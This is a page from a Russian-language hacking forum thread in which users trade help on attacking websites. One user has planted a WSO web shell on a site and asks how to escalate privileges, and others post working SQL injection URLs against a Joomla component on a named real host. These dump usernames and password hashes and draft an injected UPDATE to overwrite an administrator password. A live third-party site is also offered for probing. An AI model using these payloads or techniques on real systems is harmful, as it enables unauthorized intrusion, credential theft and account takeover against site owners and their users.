Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. skagen

    skagen Member

    Joined:
    8 Jan 2010
    Messages:
    148
    Likes Received:
    13
    Reputations:
    0
    залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
    права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?
     
  2. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    332
    Likes Received:
    177
    Reputations:
    76
    Сменить овнера файла на того, который может выставить нужные права для редактирования файла. Очевидно же. На практике это означает, что нужно повысить свои права, которыx у вас не хватает для вышеперечисленных операций. Ответ на вопрос: "Что тогда делать?" напрашивается сам собой.
     
  3. Mr.Snuffer

    Mr.Snuffer Member

    Joined:
    2 Jul 2010
    Messages:
    149
    Likes Received:
    13
    Reputations:
    0
    Если в папке есть права - удали файл и создай заного
     
  4. Mihailov Alx

    Mihailov Alx New Member

    Joined:
    1 Apr 2011
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    уязвимость (SQL inj) Joomla в компоненте Digistore
    http://www.exploitsdownload.com/exploit/na/joomla-digistore-sql-injection

    http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digistoreProducts&task=list&cid[]=-2/**/union/**/select/**/user(),user(),user(),version(),user(),user()

    Объясните пожалуйста, при помощи этой уязвимости реально слить хэши и ники из основной БД сайта?
     
    #20244 Mihailov Alx, 23 Apr 2012
    Last edited: 23 Apr 2012
  5. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    а в чем проблема?
    Code:
    http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digistor%20eProducts&task=list&cid[]=-2/**/union/**/select/**/group_concat%28username,0x3a,password%29,2,3,4/**/from/**/j17w2hcpwjzo5__users
    
     
    1 person likes this.
  6. Mihailov Alx

    Mihailov Alx New Member

    Joined:
    1 Apr 2011
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Я бы был невероятно признателен Вам, если бы разъяснили в чём соль. Просто в прошлый раз когда я получал пароли на локалхосте (самописный двиг с детской уязвимостью), все хэши выпадали в ошибку, а тут даже в исходном коде нет намёков. Извините если напрягаю
     
  7. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    как минимум то, что у тебя 6 полей было, а у меня 4
     
  8. skagen

    skagen Member

    Joined:
    8 Jan 2010
    Messages:
    148
    Likes Received:
    13
    Reputations:
    0
    и каким образом сменить владельца то или повысить свои права?
     
  9. Mihailov Alx

    Mihailov Alx New Member

    Joined:
    1 Apr 2011
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    ну а дела то в конечном итоге не меняет
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    как это так «дела не меняет?».
     
    _________________________
  11. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    No checkbone?

    Code:
    http://www.wollatonpirates.co.uk/index.php?option=com_joomleague&func=showNextMatch&p=1
     
  12. Mihailov Alx

    Mihailov Alx New Member

    Joined:
    1 Apr 2011
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    в том смысле, что это нельзя эксплуатировать, и быть может это вообще не уязвимость
     
  13. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    наркоман шоле? Serafim белым по русски написал вроде:
    http://forum.antichat.ru/showpost.php?p=3117961&postcount=20488
     
  14. Mihailov Alx

    Mihailov Alx New Member

    Joined:
    1 Apr 2011
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Будучи новичком в этом, не зря попросил разъяснения. То, что вы молчите и смотрите свысока не делает вас умнее. Я к примеру, когда понимаю в какой-то области - помогаю, если вижу что человек тупит - не скатываюсь до уровня скотины с оскорблениями, для меня лучше пройти мимо. И то, подобное редкость, в основном подаю руку.
     
  15. [ Dumi ]

    [ Dumi ] Member

    Joined:
    27 May 2009
    Messages:
    26
    Likes Received:
    66
    Reputations:
    13
    Согласен:(
     
    1 person likes this.
  16. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    какие оскорбления? ты на прошлой странице написал, что нет ни единого намёка в исходном коде, если ты туда смотрел - ты не мог не заметить вывода. и кто тебе сказал, что тебе обязаны разжёвывать и класть в рот? твоя невнимательность - это только твоя проблема.
     
  17. Mihailov Alx

    Mihailov Alx New Member

    Joined:
    1 Apr 2011
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Сейчас я понял откуда пошло недопонимание - я использую Google Chrome и поведение кодировок в ссылках там несколько иное, нежели в FF. Соответственно и результат иной. Если бы я раньше это узрел, то не просил пояснений.
     
  18. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    во всех браузерах всё выводится совершенно одинаково.
     
  19. Mihailov Alx

    Mihailov Alx New Member

    Joined:
    1 Apr 2011
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Я сейчас через Canary сижу, ну ладно, суть не в этом.


    как я понимаю запрос выглядит так ( синтаксис скорее всего в корне неправильный)

    UNION SELECT group_concat(`username`,`password`),2,3,4
    FROM `jos_users`

    если выполнять

    SET password='21232f297a57a5a743894a0e4a801fc3'
    WHERE id = 62;

    то это должно выглядеть так:
    /**/update/**/jos_users/**/SET/**/password='21232f297a57a5a743894a0e4a801fc3'/WHERE/**/id=62

    Поправьте
     
    #20259 Mihailov Alx, 24 Apr 2012
    Last edited: 24 Apr 2012
  20. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    http://forum.antichat.net/thread104591.html
     
Loading...
Thread Status:
Not open for further replies.